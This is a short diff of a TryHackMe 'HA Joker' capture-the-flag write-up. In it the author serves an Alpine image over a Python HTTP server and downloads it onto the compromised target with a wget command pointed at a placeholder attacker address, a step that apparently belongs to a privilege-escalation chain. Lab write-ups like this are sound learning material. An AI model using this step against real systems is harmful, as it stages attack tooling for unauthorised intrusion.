ericbulloch/kwmd/write_ups/try_hack_me/ha_joker_ctf.md

 I am grabbing an alpine image and then starting a python http server so that the target box can download the alpine image.

 Now I am going to download what I need from attack machine onto the target machine.
-Here are the command I used:
+I move to the /tmp directory since I have read and write permissions there.
+Here is the command I used:

 ```bash
 $ wget http://<attack_machine_ip>:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz